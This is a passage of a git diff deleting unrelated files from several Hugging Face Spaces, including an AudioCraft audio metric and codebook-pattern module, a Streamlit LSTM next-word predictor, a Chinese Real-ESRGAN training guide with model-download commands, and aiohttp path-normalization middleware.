/* Keyword.Namespace */ -.codehilite .kp { color: #66d9ef } /* Keyword.Pseudo */ -.codehilite .kr { color: #66d9ef } /* Keyword.Reserved */ -.codehilite .kt { color: #66d9ef } /* Keyword.Type */ -.codehilite .ld { color: #e6db74 } /* Literal.Date */ -.codehilite .m { color: #ae81ff } /* Literal.Number */ -.codehilite .s { color: #e6db74 } /* Literal.String */ -.codehilite .na { color: #a6e22e } /* Name.Attribute */ -.codehilite .nb { color: #f8f8f2 } /* Name.Builtin */ -.codehilite .nc { color: #a6e22e } /* Name.Class */ -.codehilite .no { color: #66d9ef } /* Name.Constant */ -.codehilite .nd { color: #a6e22e } /* Name.Decorator */ -.codehilite .ni { color: #f8f8f2 } /* Name.Entity */ -.codehilite .ne { color: #a6e22e } /* Name.Exception */ -.codehilite .nf { color: #a6e22e } /* Name.Function */ -.codehilite .nl { color: #f8f8f2 } /* Name.Label */ -.codehilite .nn { color: #f8f8f2 } /* Name.Namespace */ -.codehilite .nx { color: #a6e22e } /* Name.Other */ -.codehilite .py { color: #f8f8f2 } /* Name.Property */ -.codehilite .nt { color: #f92672 } /* Name.Tag */ -.codehilite .nv { color: #f8f8f2 } /* Name.Variable */ -.codehilite .ow { color: #f92672 } /* Operator.Word */ -.codehilite .w { color: #f8f8f2 } /* Text.Whitespace */ -.codehilite .mb { color: #ae81ff } /* Literal.Number.Bin */ -.codehilite .mf { color: #ae81ff } /* Literal.Number.Float */ -.codehilite .mh { color: #ae81ff } /* Literal.Number.Hex */ -.codehilite .mi { color: #ae81ff } /* Literal.Number.Integer */ -.codehilite .mo { color: #ae81ff } /* Literal.Number.Oct */ -.codehilite .sa { color: #e6db74 } /* Literal.String.Affix */ -.codehilite .sb { color: #e6db74 } /* Literal.String.Backtick */ -.codehilite .sc { color: #e6db74 } /* Literal.String.Char */ -.codehilite .dl { color: #e6db74 } /* Literal.String.Delimiter */ -.codehilite .sd { color: #e6db74 } /* Literal.String.Doc */ -.codehilite .s2 { color: #e6db74 } /* Literal.String.Double */ -.codehilite .se { color: #ae81ff } /* Literal.String.Escape */ -.codehilite .sh { color: #e6db74 } /* Literal.String.Heredoc */ -.codehilite .si { color: #e6db74 } /* Literal.String.Interpol */ -.codehilite .sx { color: #e6db74 } /* Literal.String.Other */ -.codehilite .sr { color: #e6db74 } /* Literal.String.Regex */ -.codehilite .s1 { color: #e6db74 } /* Literal.String.Single */ -.codehilite .ss { color: #e6db74 } /* Literal.String.Symbol */ -.codehilite .bp { color: #f8f8f2 } /* Name.Builtin.Pseudo */ -.codehilite .fm { color: #a6e22e } /* Name.Function.Magic */ -.codehilite .vc { color: #f8f8f2 } /* Name.Variable.Class */ -.codehilite .vg { color: #f8f8f2 } /* Name.Variable.Global */ -.codehilite .vi { color: #f8f8f2 } /* Name.Variable.Instance */ -.codehilite .vm { color: #f8f8f2 } /* Name.Variable.Magic */ -.codehilite .il { color: #ae81ff } /* Literal.Number.Integer.Long */ - -/* 全局元素 */ -* { - transition: all 0.6s; -} diff --git a/spaces/SuYuanS/AudioCraft_Plus/audiocraft/metrics/chroma_cosinesim.py b/spaces/SuYuanS/AudioCraft_Plus/audiocraft/metrics/chroma_cosinesim.py deleted file mode 100644 index 40c26081b803c2017fae1b6d7d086f0b0e074cef..0000000000000000000000000000000000000000 --- a/spaces/SuYuanS/AudioCraft_Plus/audiocraft/metrics/chroma_cosinesim.py +++ /dev/null @@ -1,72 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import torch -import torchmetrics - -from ..data.audio_utils import convert_audio -from ..modules.chroma import ChromaExtractor - - -class ChromaCosineSimilarityMetric(torchmetrics.Metric): - """Chroma cosine similarity metric. - - This metric extracts a chromagram for a reference waveform and - a generated waveform and compares each frame using the cosine similarity - function. The output is the mean cosine similarity. - - Args: - sample_rate (int): Sample rate used by the chroma extractor. - n_chroma (int): Number of chroma used by the chroma extractor. - radix2_exp (int): Exponent for the chroma extractor. - argmax (bool): Whether the chroma extractor uses argmax. - eps (float): Epsilon for cosine similarity computation. - """ - def __init__(self, sample_rate: int, n_chroma: int, radix2_exp: int, argmax: bool, eps: float = 1e-8): - super().__init__() - self.chroma_sample_rate = sample_rate - self.n_chroma = n_chroma - self.eps = eps - self.chroma_extractor = ChromaExtractor(sample_rate=self.chroma_sample_rate, n_chroma=self.n_chroma, - radix2_exp=radix2_exp, argmax=argmax) - self.add_state("cosine_sum", default=torch.tensor(0.), dist_reduce_fx="sum") - self.add_state("weight", default=torch.tensor(0.), dist_reduce_fx="sum") - - def update(self, preds: torch.Tensor, targets: torch.Tensor, - sizes: torch.Tensor, sample_rates: torch.Tensor) -> None: - """Compute cosine similarity between chromagrams and accumulate scores over the dataset.""" - if preds.size(0) == 0: - return - - assert preds.shape == targets.shape, ( - f"Preds and target shapes mismatch: preds={preds.shape}, targets={targets.shape}") - assert preds.size(0) == sizes.size(0), ( - f"Number of items in preds ({preds.shape}) mismatch ", - f"with sizes ({sizes.shape})") - assert preds.size(0) == sample_rates.size(0), ( - f"Number of items in preds ({preds.shape}) mismatch ", - f"with sample_rates ({sample_rates.shape})") - assert torch.all(sample_rates == sample_rates[0].item()), "All sample rates are not the same in the batch" - - device = self.weight.device - preds, targets = preds.to(device), targets.to(device) # type: ignore - sample_rate = sample_rates[0].item() - preds = convert_audio(preds, from_rate=sample_rate, to_rate=self.chroma_sample_rate, to_channels=1) - targets = convert_audio(targets, from_rate=sample_rate, to_rate=self.chroma_sample_rate, to_channels=1) - gt_chroma = self.chroma_extractor(targets) - gen_chroma = self.chroma_extractor(preds) - chroma_lens = (sizes / self.chroma_extractor.winhop).ceil().int() - for i in range(len(gt_chroma)): - t = int(chroma_lens[i].item()) - cosine_sim = torch.nn.functional.cosine_similarity( - gt_chroma[i, :t], gen_chroma[i, :t], dim=1, eps=self.eps) - self.cosine_sum += cosine_sim.sum(dim=0) # type: ignore - self.weight += torch.tensor(t) # type: ignore - - def compute(self) -> float: - """Computes the average cosine similarty across all generated/target chromagrams pairs.""" - assert self.weight.item() > 0, "Unable to compute with total number of comparisons <= 0" # type: ignore - return (self.cosine_sum / self.weight).item() # type: ignore diff --git a/spaces/Sudhanshu976/NLP_FULL_APP/pages/7_NEXT_WORD_PREDICTOR.py b/spaces/Sudhanshu976/NLP_FULL_APP/pages/7_NEXT_WORD_PREDICTOR.py deleted file mode 100644 index 19c952e7f452f40dfbd69ee255522e6fc1137102..0000000000000000000000000000000000000000 --- a/spaces/Sudhanshu976/NLP_FULL_APP/pages/7_NEXT_WORD_PREDICTOR.py +++ /dev/null @@ -1,75 +0,0 @@ -import streamlit as st -import numpy as np - - -st.set_page_config( - page_title="NLP WEB APP" -) - -st.title("NEXT WORD PREDICTOR") -st.sidebar.success("Select a page above") - - -string1 = st.text_area("Enter the training text (Note : This may take time depending upon the data size )") - - - -test = st.text_input("ENTER THE WORD") -number = st.number_input("Enter the number of next words" ) -number = int(number) - - -import tensorflow as tf -import numpy as np -from tensorflow.keras.preprocessing.text import Tokenizer -from tensorflow.keras.preprocessing.sequence import pad_sequences -from tensorflow.keras.utils import to_categorical -from tensorflow.keras.models import Sequential -from tensorflow.keras.layers import Embedding,Dense,LSTM - -if st.button("PREDICT"): - tokenizer = Tokenizer() - tokenizer.fit_on_texts([string1]) - - input_sequences =[] - for sentence in string1.split("\n"): - tokenized_sentences = tokenizer.texts_to_sequences([sentence])[0] - - for i in range(1,len(tokenized_sentences)): - input_sequences.append(tokenized_sentences[:i+1]) - - - max_len = max([len(x) for x in input_sequences]) - use = max_len-1 - - padded_input_sentences = pad_sequences(input_sequences , maxlen = max_len , padding ="pre") - X = padded_input_sentences[:,:-1] - Y = padded_input_sentences[:,-1] - num_class = len(tokenizer.word_index) - Y = to_categorical(Y , num_classes=num_class+1) - - - - model = Sequential() - model.add(Embedding(num_class+1,100,input_length = None)) - - model.add(LSTM(250)) - - model.add(Dense(num_class+1,activation ="softmax")) - - model.compile(loss="categorical_crossentropy" , optimizer="adam" , metrics=["accuracy"]) - - - model.fit(X,Y,epochs=100) - - for i in range(number): - - - output_token = tokenizer.texts_to_sequences([test])[0] - padded_token = pad_sequences([output_token] , maxlen=max_len, padding="pre") - output = np.argmax(model.predict(padded_token)) - for word,index in tokenizer.word_index.items(): - if index == output: - test =test + " " + word - - st.header(test) diff --git a/spaces/Sumit7864/Image-Enhancer/docs/Training_CN.md b/spaces/Sumit7864/Image-Enhancer/docs/Training_CN.md deleted file mode 100644 index dabc3c5d97e134a2d551157c2dd03a629ec661bc..0000000000000000000000000000000000000000 --- a/spaces/Sumit7864/Image-Enhancer/docs/Training_CN.md +++ /dev/null @@ -1,271 +0,0 @@ -# :computer: 如何训练/微调 Real-ESRGAN - -- [训练 Real-ESRGAN](#训练-real-esrgan) - - [概述](#概述) - - [准备数据集](#准备数据集) - - [训练 Real-ESRNet 模型](#训练-real-esrnet-模型) - - [训练 Real-ESRGAN 模型](#训练-real-esrgan-模型) -- [用自己的数据集微调 Real-ESRGAN](#用自己的数据集微调-real-esrgan) - - [动态生成降级图像](#动态生成降级图像) - - [使用已配对的数据](#使用已配对的数据) - -[English](Training.md) **|** [简体中文](Training_CN.md) - -## 训练 Real-ESRGAN - -### 概述 - -训练分为两个步骤。除了 loss 函数外,这两个步骤拥有相同数据合成以及训练的一条龙流程。具体点说: - -1. 首先使用 L1 loss 训练 Real-ESRNet 模型,其中 L1 loss 来自预先训练的 ESRGAN 模型。 - -2. 然后我们将 Real-ESRNet 模型作为生成器初始化,结合L1 loss、感知 loss、GAN loss 三者的参数对 Real-ESRGAN 进行训练。 - -### 准备数据集 - -我们使用 DF2K ( DIV2K 和 Flickr2K ) + OST 数据集进行训练。只需要HR图像!
    -下面是网站链接: -1. DIV2K: http://data.vision.ee.ethz.ch/cvl/DIV2K/DIV2K_train_HR.zip -2. Flickr2K: https://cv.snu.ac.kr/research/EDSR/Flickr2K.tar -3. OST: https://openmmlab.oss-cn-hangzhou.aliyuncs.com/datasets/OST_dataset.zip - -以下是数据的准备步骤。 - -#### 第1步:【可选】生成多尺寸图片 - -针对 DF2K 数据集,我们使用多尺寸缩放策略,*换言之*,我们对 HR 图像进行下采样,就能获得多尺寸的标准参考(Ground-Truth)图像。
    -您可以使用这个 [scripts/generate_multiscale_DF2K.py](scripts/generate_multiscale_DF2K.py) 脚本快速生成多尺寸的图像。
    -注意:如果您只想简单试试,那么可以跳过此步骤。 - -```bash -python scripts/generate_multiscale_DF2K.py --input datasets/DF2K/DF2K_HR --output datasets/DF2K/DF2K_multiscale -``` - -#### 第2步:【可选】裁切为子图像 - -我们可以将 DF2K 图像裁切为子图像,以加快 IO 和处理速度。
    -如果你的 IO 够好或储存空间有限,那么此步骤是可选的。
    - -您可以使用脚本 [scripts/extract_subimages.py](scripts/extract_subimages.py)。这是使用示例: - -```bash - python scripts/extract_subimages.py --input datasets/DF2K/DF2K_multiscale --output datasets/DF2K/DF2K_multiscale_sub --crop_size 400 --step 200 -``` - -#### 第3步:准备元信息 txt - -您需要准备一个包含图像路径的 txt 文件。下面是 `meta_info_DF2Kmultiscale+OST_sub.txt` 中的部分展示(由于各个用户可能有截然不同的子图像划分,这个文件不适合你的需求,你得准备自己的 txt 文件): - -```txt -DF2K_HR_sub/000001_s001.png -DF2K_HR_sub/000001_s002.png -DF2K_HR_sub/000001_s003.png -... -``` - -你可以使用该脚本 [scripts/generate_meta_info.py](scripts/generate_meta_info.py) 生成包含图像路径的 txt 文件。
    -你还可以合并多个文件夹的图像路径到一个元信息(meta_info)txt。这是使用示例: - -```bash - python scripts/generate_meta_info.py --input datasets/DF2K/DF2K_HR, datasets/DF2K/DF2K_multiscale --root datasets/DF2K, datasets/DF2K --meta_info datasets/DF2K/meta_info/meta_info_DF2Kmultiscale.txt -``` - -### 训练 Real-ESRNet 模型 - -1. 下载预先训练的模型 [ESRGAN](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/ESRGAN_SRx4_DF2KOST_official-ff704c30.pth),放到 `experiments/pretrained_models`目录下。 - ```bash - wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/ESRGAN_SRx4_DF2KOST_official-ff704c30.pth -P experiments/pretrained_models - ``` -2. 相应地修改选项文件 `options/train_realesrnet_x4plus.yml` 中的内容: - ```yml - train: - name: DF2K+OST - type: RealESRGANDataset - dataroot_gt: datasets/DF2K # 修改为你的数据集文件夹根目录 - meta_info: realesrgan/meta_info/meta_info_DF2Kmultiscale+OST_sub.txt # 修改为你自己生成的元信息txt - io_backend: - type: disk - ``` -3. 如果你想在训练过程中执行验证,就取消注释这些内容并进行相应的修改: - ```yml - # 取消注释这些以进行验证 - # val: - # name: validation - # type: PairedImageDataset - # dataroot_gt: path_to_gt - # dataroot_lq: path_to_lq - # io_backend: - # type: disk - - ... - - # 取消注释这些以进行验证 - # 验证设置 - # val: - # val_freq: !!float 5e3 - # save_img: True - - # metrics: - # psnr: # 指标名称,可以是任意的 - # type: calculate_psnr - # crop_border: 4 - # test_y_channel: false - ``` -4. 正式训练之前,你可以用 `--debug` 模式检查是否正常运行。我们用了4个GPU进行训练: - ```bash - CUDA_VISIBLE_DEVICES=0,1,2,3 \ - python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --launcher pytorch --debug - ``` - - 用 **1个GPU** 训练的 debug 模式示例: - ```bash - python realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --debug - ``` -5. 正式训练开始。我们用了4个GPU进行训练。还可以使用参数 `--auto_resume` 在必要时自动恢复训练。 - ```bash - CUDA_VISIBLE_DEVICES=0,1,2,3 \ - python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --launcher pytorch --auto_resume - ``` - - 用 **1个GPU** 训练: - ```bash - python realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --auto_resume - ``` - -### 训练 Real-ESRGAN 模型 - -1. 训练 Real-ESRNet 模型后,您得到了这个 `experiments/train_RealESRNetx4plus_1000k_B12G4_fromESRGAN/model/net_g_1000000.pth` 文件。如果需要指定预训练路径到其他文件,请修改选项文件 `train_realesrgan_x4plus.yml` 中 `pretrain_network_g` 的值。 -1. 修改选项文件 `train_realesrgan_x4plus.yml` 的内容。大多数修改与上节提到的类似。 -1. 正式训练之前,你可以以 `--debug` 模式检查是否正常运行。我们使用了4个GPU进行训练: - ```bash - CUDA_VISIBLE_DEVICES=0,1,2,3 \ - python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrgan_x4plus.yml --launcher pytorch --debug - ``` - - 用 **1个GPU** 训练的 debug 模式示例: - ```bash - python realesrgan/train.py -opt options/train_realesrgan_x4plus.yml --debug - ``` -1. 正式训练开始。我们使用4个GPU进行训练。还可以使用参数 `--auto_resume` 在必要时自动恢复训练。 - ```bash - CUDA_VISIBLE_DEVICES=0,1,2,3 \ - python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrgan_x4plus.yml --launcher pytorch --auto_resume - ``` - - 用 **1个GPU** 训练: - ```bash - python realesrgan/train.py -opt options/train_realesrgan_x4plus.yml --auto_resume - ``` - -## 用自己的数据集微调 Real-ESRGAN - -你可以用自己的数据集微调 Real-ESRGAN。一般地,微调(Fine-Tune)程序可以分为两种类型: - -1. [动态生成降级图像](#动态生成降级图像) -2. [使用**已配对**的数据](#使用已配对的数据) - -### 动态生成降级图像 - -只需要高分辨率图像。在训练过程中,使用 Real-ESRGAN 描述的降级模型生成低质量图像。 - -**1. 准备数据集** - -完整信息请参见[本节](#准备数据集)。 - -**2. 下载预训练模型** - -下载预先训练的模型到 `experiments/pretrained_models` 目录下。 - -- *RealESRGAN_x4plus.pth*: - ```bash - wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P experiments/pretrained_models - ``` - -- *RealESRGAN_x4plus_netD.pth*: - ```bash - wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.3/RealESRGAN_x4plus_netD.pth -P experiments/pretrained_models - ``` - -**3. 微调** - -修改选项文件 [options/finetune_realesrgan_x4plus.yml](options/finetune_realesrgan_x4plus.yml) ,特别是 `datasets` 部分: - -```yml -train: - name: DF2K+OST - type: RealESRGANDataset - dataroot_gt: datasets/DF2K # 修改为你的数据集文件夹根目录 - meta_info: realesrgan/meta_info/meta_info_DF2Kmultiscale+OST_sub.txt # 修改为你自己生成的元信息txt - io_backend: - type: disk -``` - -我们使用4个GPU进行训练。还可以使用参数 `--auto_resume` 在必要时自动恢复训练。 - -```bash -CUDA_VISIBLE_DEVICES=0,1,2,3 \ -python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/finetune_realesrgan_x4plus.yml --launcher pytorch --auto_resume -``` - -用 **1个GPU** 训练: -```bash -python realesrgan/train.py -opt options/finetune_realesrgan_x4plus.yml --auto_resume -``` - -### 使用已配对的数据 - -你还可以用自己已经配对的数据微调 RealESRGAN。这个过程更类似于微调 ESRGAN。 - -**1. 准备数据集** - -假设你已经有两个文件夹(folder): - -- **gt folder**(标准参考,高分辨率图像):*datasets/DF2K/DIV2K_train_HR_sub* -- **lq folder**(低质量,低分辨率图像):*datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub* - -然后,您可以使用脚本 [scripts/generate_meta_info_pairdata.py](scripts/generate_meta_info_pairdata.py) 生成元信息(meta_info)txt 文件。 - -```bash -python scripts/generate_meta_info_pairdata.py --input datasets/DF2K/DIV2K_train_HR_sub datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub --meta_info datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt -``` - -**2. 下载预训练模型** - -下载预先训练的模型到 `experiments/pretrained_models` 目录下。 - -- *RealESRGAN_x4plus.pth*: - ```bash - wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P experiments/pretrained_models - ``` - -- *RealESRGAN_x4plus_netD.pth*: - ```bash - wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.3/RealESRGAN_x4plus_netD.pth -P experiments/pretrained_models - ``` - -**3. 微调** - -修改选项文件 [options/finetune_realesrgan_x4plus_pairdata.yml](options/finetune_realesrgan_x4plus_pairdata.yml) ,特别是 `datasets` 部分: - -```yml -train: - name: DIV2K - type: RealESRGANPairedDataset - dataroot_gt: datasets/DF2K # 修改为你的 gt folder 文件夹根目录 - dataroot_lq: datasets/DF2K # 修改为你的 lq folder 文件夹根目录 - meta_info: datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt # 修改为你自己生成的元信息txt - io_backend: - type: disk -``` - -我们使用4个GPU进行训练。还可以使用参数 `--auto_resume` 在必要时自动恢复训练。 - -```bash -CUDA_VISIBLE_DEVICES=0,1,2,3 \ -python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/finetune_realesrgan_x4plus_pairdata.yml --launcher pytorch --auto_resume -``` - -用 **1个GPU** 训练: -```bash -python realesrgan/train.py -opt options/finetune_realesrgan_x4plus_pairdata.yml --auto_resume -``` diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/web_middlewares.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/web_middlewares.py deleted file mode 100644 index fabcc449a2107211fd99cd59f576a2d855d0e042..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/web_middlewares.py +++ /dev/null @@ -1,119 +0,0 @@ -import re -from typing import TYPE_CHECKING, Awaitable, Callable, Tuple, Type, TypeVar - -from .typedefs import Handler -from .web_exceptions import HTTPPermanentRedirect, _HTTPMove -from .web_request import Request -from .web_response import StreamResponse -from .web_urldispatcher import SystemRoute - -__all__ = ( - "middleware", - "normalize_path_middleware", -) - -if TYPE_CHECKING: # pragma: no cover - from .web_app import Application - -_Func = TypeVar("_Func") - - -async def _check_request_resolves(request: Request, path: str) -> Tuple[bool, Request]: - alt_request = request.clone(rel_url=path) - - match_info = await request.app.router.resolve(alt_request) - alt_request._match_info = match_info - - if match_info.http_exception is None: - return True, alt_request - - return False, request - - -def middleware(f: _Func) -> _Func: - f.__middleware_version__ = 1 # type: ignore[attr-defined] - return f - - -_Middleware = Callable[[Request, Handler], Awaitable[StreamResponse]] - - -def normalize_path_middleware( - *, - append_slash: bool = True, - remove_slash: bool = False, - merge_slashes: bool = True, - redirect_class: Type[_HTTPMove] = HTTPPermanentRedirect, -) -> _Middleware: - """Factory for producing a middleware that normalizes the path of a request. - - Normalizing means: - - Add or remove a trailing slash to the path. - - Double slashes are replaced by one. - - The middleware returns as soon as it finds a path that resolves - correctly. The order if both merge and append/remove are enabled is - 1) merge slashes - 2) append/remove slash - 3) both merge slashes and append/remove slash. - If the path resolves with at least one of those conditions, it will - redirect to the new path. - - Only one of `append_slash` and `remove_slash` can be enabled. If both - are `True` the factory will raise an assertion error - - If `append_slash` is `True` the middleware will append a slash when - needed. If a resource is defined with trailing slash and the request - comes without it, it will append it automatically. - - If `remove_slash` is `True`, `append_slash` must be `False`. When enabled - the middleware will remove trailing slashes and redirect if the resource - is defined - - If merge_slashes is True, merge multiple consecutive slashes in the - path into one. - """ - correct_configuration = not (append_slash and remove_slash) - assert correct_configuration, "Cannot both remove and append slash" - - @middleware - async def impl(request: Request, handler: Handler) -> StreamResponse: - if isinstance(request.match_info.route, SystemRoute): - paths_to_check = [] - if "?" in request.raw_path: - path, query = request.raw_path.split("?", 1) - query = "?" + query - else: - query = "" - path = request.raw_path - - if merge_slashes: - paths_to_check.append(re.sub("//+", "/", path)) - if append_slash and not request.path.endswith("/"): - paths_to_check.append(path + "/") - if remove_slash and request.path.endswith("/"): - paths_to_check.append(path[:-1]) - if merge_slashes and append_slash: - paths_to_check.append(re.sub("//+", "/", path + "/")) - if merge_slashes and remove_slash: - merged_slashes = re.sub("//+", "/", path) - paths_to_check.append(merged_slashes[:-1]) - - for path in paths_to_check: - path = re.sub("^//+", "/", path) # SECURITY: GHSA-v6wp-4m6f-gcjg - resolves, request = await _check_request_resolves(request, path) - if resolves: - raise redirect_class(request.raw_path + query) - - return await handler(request) - - return impl - - -def _fix_request_current_app(app: "Application") -> _Middleware: - @middleware - async def impl(request: Request, handler: Handler) -> StreamResponse: - with request.match_info.set_current_app(app): - return await handler(request) - - return impl diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_frame_eval/release_mem.h b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_frame_eval/release_mem.h deleted file mode 100644 index cc6e3d9269668c0e6ab1ba656cd3b254c6106804..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_frame_eval/release_mem.h +++ /dev/null @@ -1,5 +0,0 @@ -#include "Python.h" - -void release_co_extra(void *obj) { - Py_XDECREF(obj); -} diff --git a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/codebooks_patterns.py b/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/codebooks_patterns.py deleted file mode 100644 index c5b35cbea8cff84aa56116dbdd860fc72a913a13..0000000000000000000000000000000000000000 --- a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/codebooks_patterns.py +++ /dev/null @@ -1,539 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from collections import namedtuple -from dataclasses import dataclass -from functools import lru_cache -import logging -import typing as tp - -from abc import ABC, abstractmethod -import torch - -LayoutCoord = namedtuple('LayoutCoord', ['t', 'q']) # (timestep, codebook index) -PatternLayout = tp.List[tp.List[LayoutCoord]] # Sequence of coordinates -logger = logging.getLogger(__name__) - - -@dataclass -class Pattern: - """Base implementation of a pattern over a sequence with multiple codebooks. - - The codebook pattern consists in a layout, defining for each sequence step - the list of coordinates of each codebook timestep in the resulting interleaved sequence. - The first item of the pattern is always an empty list in order to properly insert a special token - to start with. For convenience, we also keep track of ``n_q`` the number of codebooks used for the pattern - and ``timesteps`` the number of timesteps corresponding to the original sequence. - - The pattern provides convenient methods to build and revert interleaved sequences from it: - ``build_pattern_sequence`` maps a given a dense input tensor of multi-codebook sequence from [B, K, T] - to the interleaved sequence of shape [B, K, S] applying the pattern, with S being the batch size, - K being the number of codebooks, T the number of original timesteps and S the number of sequence steps - for the output sequence. The unfilled positions are replaced with a special token and the built sequence - is returned along with a mask indicating valid tokens. - ``revert_pattern_sequence`` maps back an interleaved sequence of shape [B, K, S] to the original alignment - of codebooks across timesteps to an output tensor of shape [B, K, T], using again a special token and a mask - to fill and specify invalid positions if needed. - See the dedicated methods for more details. - """ - # Pattern layout, for each sequence step, we have a list of coordinates - # corresponding to the original codebook timestep and position. - # The first list is always an empty list in order to properly insert - # a special token to start with. - layout: PatternLayout - timesteps: int - n_q: int - - def __post_init__(self): - assert len(self.layout) > 0 - assert self.layout[0] == [] - self._validate_layout() - self._build_reverted_sequence_scatter_indexes = lru_cache(100)(self._build_reverted_sequence_scatter_indexes) - self._build_pattern_sequence_scatter_indexes = lru_cache(100)(self._build_pattern_sequence_scatter_indexes) - logger.info("New pattern, time steps: %d, sequence steps: %d", self.timesteps, len(self.layout)) - - def _validate_layout(self): - """Runs checks on the layout to ensure a valid pattern is defined. - A pattern is considered invalid if: - - Multiple timesteps for a same codebook are defined in the same sequence step - - The timesteps for a given codebook are not in ascending order as we advance in the sequence - (this would mean that we have future timesteps before past timesteps). - """ - q_timesteps = {q: 0 for q in range(self.n_q)} - for s, seq_coords in enumerate(self.layout): - if len(seq_coords) > 0: - qs = set() - for coord in seq_coords: - qs.add(coord.q) - last_q_timestep = q_timesteps[coord.q] - assert coord.t >= last_q_timestep, \ - f"Past timesteps are found in the sequence for codebook = {coord.q} at step {s}" - q_timesteps[coord.q] = coord.t - # each sequence step contains at max 1 coordinate per codebook - assert len(qs) == len(seq_coords), \ - f"Multiple entries for a same codebook are found at step {s}" - - @property - def num_sequence_steps(self): - return len(self.layout) - 1 - - @property - def max_delay(self): - max_t_in_seq_coords = 0 - for seq_coords in self.layout[1:]: - for coords in seq_coords: - max_t_in_seq_coords = max(max_t_in_seq_coords, coords.t + 1) - return max_t_in_seq_coords - self.timesteps - - @property - def valid_layout(self): - valid_step = len(self.layout) - self.max_delay - return self.layout[:valid_step] - - def get_sequence_coords_with_timestep(self, t: int, q: tp.Optional[int] = None): - """Get codebook coordinates in the layout that corresponds to the specified timestep t - and optionally to the codebook q. Coordinates are returned as a tuple with the sequence step - and the actual codebook coordinates. - """ - assert t <= self.timesteps, "provided timesteps is greater than the pattern's number of timesteps" - if q is not None: - assert q <= self.n_q, "provided number of codebooks is greater than the pattern's number of codebooks" - coords = [] - for s, seq_codes in enumerate(self.layout): - for code in seq_codes: - if code.t == t and (q is None or code.q == q): - coords.append((s, code)) - return coords - - def get_steps_with_timestep(self, t: int, q: tp.Optional[int] = None) -> tp.List[int]: - return [step for step, coords in self.get_sequence_coords_with_timestep(t, q)] - - def get_first_step_with_timesteps(self, t: int, q: tp.Optional[int] = None) -> tp.Optional[int]: - steps_with_timesteps = self.get_steps_with_timestep(t, q) - return steps_with_timesteps[0] if len(steps_with_timesteps) > 0 else None - - def _build_pattern_sequence_scatter_indexes(self, timesteps: int, n_q: int, keep_only_valid_steps: bool, - device: tp.Union[torch.device, str] = 'cpu'): - """Build scatter indexes corresponding to the pattern, up to the provided sequence_steps. - - Args: - timesteps (int): Maximum number of timesteps steps to consider. - keep_only_valid_steps (bool): Restrict the pattern layout to match only valid steps. - device (Union[torch.device, str]): Device for created tensors. - Returns: - indexes (torch.Tensor): Indexes corresponding to the sequence, of shape [K, S]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes, of shape [K, S]. - """ - assert n_q == self.n_q, f"invalid number of codebooks for the sequence and the pattern: {n_q} != {self.n_q}" - assert timesteps <= self.timesteps, "invalid number of timesteps used to build the sequence from the pattern" - # use the proper layout based on whether we limit ourselves to valid steps only or not, - # note that using the valid_layout will result in a truncated sequence up to the valid steps - ref_layout = self.valid_layout if keep_only_valid_steps else self.layout - # single item indexing being super slow with pytorch vs. numpy, so we use numpy here - indexes = torch.zeros(n_q, len(ref_layout), dtype=torch.long).numpy() - mask = torch.zeros(n_q, len(ref_layout), dtype=torch.bool).numpy() - # fill indexes with last sequence step value that will correspond to our special token - # the last value is n_q * timesteps as we have flattened z and append special token as the last token - # which will correspond to the index: n_q * timesteps - indexes[:] = n_q * timesteps - # iterate over the pattern and fill scattered indexes and mask - for s, sequence_coords in enumerate(ref_layout): - for coords in sequence_coords: - if coords.t < timesteps: - indexes[coords.q, s] = coords.t + coords.q * timesteps - mask[coords.q, s] = 1 - indexes = torch.from_numpy(indexes).to(device) - mask = torch.from_numpy(mask).to(device) - return indexes, mask - - def build_pattern_sequence(self, z: torch.Tensor, special_token: int, keep_only_valid_steps: bool = False): - """Build sequence corresponding to the pattern from the input tensor z. - The sequence is built using up to sequence_steps if specified, and non-pattern - coordinates are filled with the special token. - - Args: - z (torch.Tensor): Input tensor of multi-codebooks sequence, of shape [B, K, T]. - special_token (int): Special token used to fill non-pattern coordinates in the new sequence. - keep_only_valid_steps (bool): Build a sequence from the pattern up to valid (= fully defined) steps. - Steps that are beyond valid steps will be replaced by the special_token in that case. - Returns: - values (torch.Tensor): 